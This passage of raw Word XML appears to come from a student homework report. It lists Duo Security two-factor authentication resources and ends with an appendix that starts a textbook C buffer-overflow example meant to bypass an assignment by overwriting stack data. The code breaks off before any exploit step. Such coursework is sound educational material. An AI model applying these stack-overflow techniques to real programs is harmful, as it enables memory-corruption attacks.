          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="002B314F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://duo.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="45C16633" w14:textId="18B75EA6" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="180" w:right="-360" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>This is the official website of Duo Security, where you can find comprehensive information about their two-factor authentication solutions, including product details, features, and implementation guides.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6D282" w14:textId="48800C49" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo Security Documentation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736417D2" w14:textId="68B7BEB5" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Documentation: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="002B314F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://duo.com/docs</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6C1C10C0" w14:textId="36748382" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Duo Security documentation provides in-depth technical resources, guides, and integration instructions for implementing and configuring Duo two-factor authentication in various environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE5F608" w14:textId="4BEBB3E1" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360" w:hanging="630"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo Security Blog:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C608CE4" w14:textId="46CE610E" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Blog: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="002B314F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://duo.com/blog</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="766E27C1" w14:textId="2EC7C491" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Duo Security blog offers articles, insights, and updates on topics related to cybersecurity, authentication best practices, and industry trends, including information on two-factor authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CCB39D" w14:textId="78C64237" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-270" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4.  </w:t>
      </w:r>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Duo Security Community:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E72FA4" w14:textId="492308AC" w:rsidR="002B314F" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Community: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="002B314F">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://community.duo.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="601077EA" w14:textId="7A9137E5" w:rsidR="001D53DA" w:rsidRDefault="002B314F" w:rsidP="002B314F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:ind w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B314F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Duo Security community is a forum where users can ask questions, share experiences, and discuss various topics related to Duo's authentication solutions, including two-factor authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301A4F2B" w14:textId="7C5BEB93" w:rsidR="001C44FA" w:rsidRDefault="001C44FA" w:rsidP="001C44FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="450" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D696720" w14:textId="2B5F2393" w:rsidR="001C44FA" w:rsidRDefault="001C44FA" w:rsidP="001C44FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE479D1" w14:textId="6EE451AD" w:rsidR="001C44FA" w:rsidRPr="001C44FA" w:rsidRDefault="001C44FA" w:rsidP="001C44FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>From this homework, I learned about various concepts and how to perform Buffer overflow attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604612A" w14:textId="77777777" w:rsidR="001D53DA" w:rsidRDefault="001D53DA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C99616D" w14:textId="2E807C61" w:rsidR="002B314F" w:rsidRDefault="00665C86" w:rsidP="001D53DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>APPENDIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12305C93" w14:textId="645C23E1" w:rsidR="006115A9" w:rsidRDefault="006115A9" w:rsidP="006115A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD95C95" w14:textId="3307DEDD" w:rsidR="006115A9" w:rsidRDefault="00070749" w:rsidP="006115A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BufferOverFlow_NormalCode.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDA17F" w14:textId="50295D7A" w:rsidR="00070749" w:rsidRDefault="00070749" w:rsidP="006115A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6EF4FE" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB9A51E" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In this example of a buffer overflow, we attempt to bypass the assignment statement by calling a method named "function" from the main function. When the method is called, the parameters are stored on the stack along with the return address, saved frame pointer, and local variables like buffer1 and buffer2, which are also pushed onto the stack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73003880" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A848713" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793ED86A" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>#include&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0145A7" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ADA0E47" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>void function (int a, int b, int c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A62A851" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DFDBE7" w14:textId="7B474AF4" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char buffer1[5];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08041AC4" w14:textId="3E3AC69E" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>char buffer2[10];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20838F9F" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070749">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72298600" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E069387" w14:textId="77777777" w:rsidR="00070749" w:rsidRPr="00070749" w:rsidRDefault="00070749" w:rsidP="00070749">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:ind w:left="-720" w:right="-720"/>
        <w:rPr>
